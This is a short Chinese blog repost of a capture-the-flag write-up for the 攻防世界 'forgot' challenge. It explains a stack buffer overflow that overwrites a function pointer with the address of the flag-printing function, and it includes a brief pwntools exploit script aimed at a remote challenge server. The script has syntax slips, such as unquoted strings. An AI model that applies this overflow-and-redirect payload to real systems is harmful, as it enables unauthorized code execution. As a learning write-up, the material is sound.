首页 > 其他 > 详细

攻防世界forgot

时间:2019-11-18 16:22:13      阅读:259      评论:0      收藏:0      [点我收藏+]

技术分享图片

代码最后调用了v3为基础,v14为偏移的地址的函数

技术分享图片

然后发现v2可以溢出,并且可以覆盖掉v3

所以我们把v3覆盖为sub_80486CC的地址(此处输出flag)

之后要解决的就是不让v14改变

直接让第一个判断函数不通过即可

技术分享图片

‘\x47‘就可以不通过

from pwn import *

# io=process(‘./forgot‘)
io=remote(111.198.29.45,41178)

io.sendline(fuck)
addr=0x80486CC
payload=\x47*(0x20)+p32(addr)
io.sendline(payload)

io.interactive()
# i am a pig

 

攻防世界forgot

原文:https://www.cnblogs.com/lxy8584099/p/11882804.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!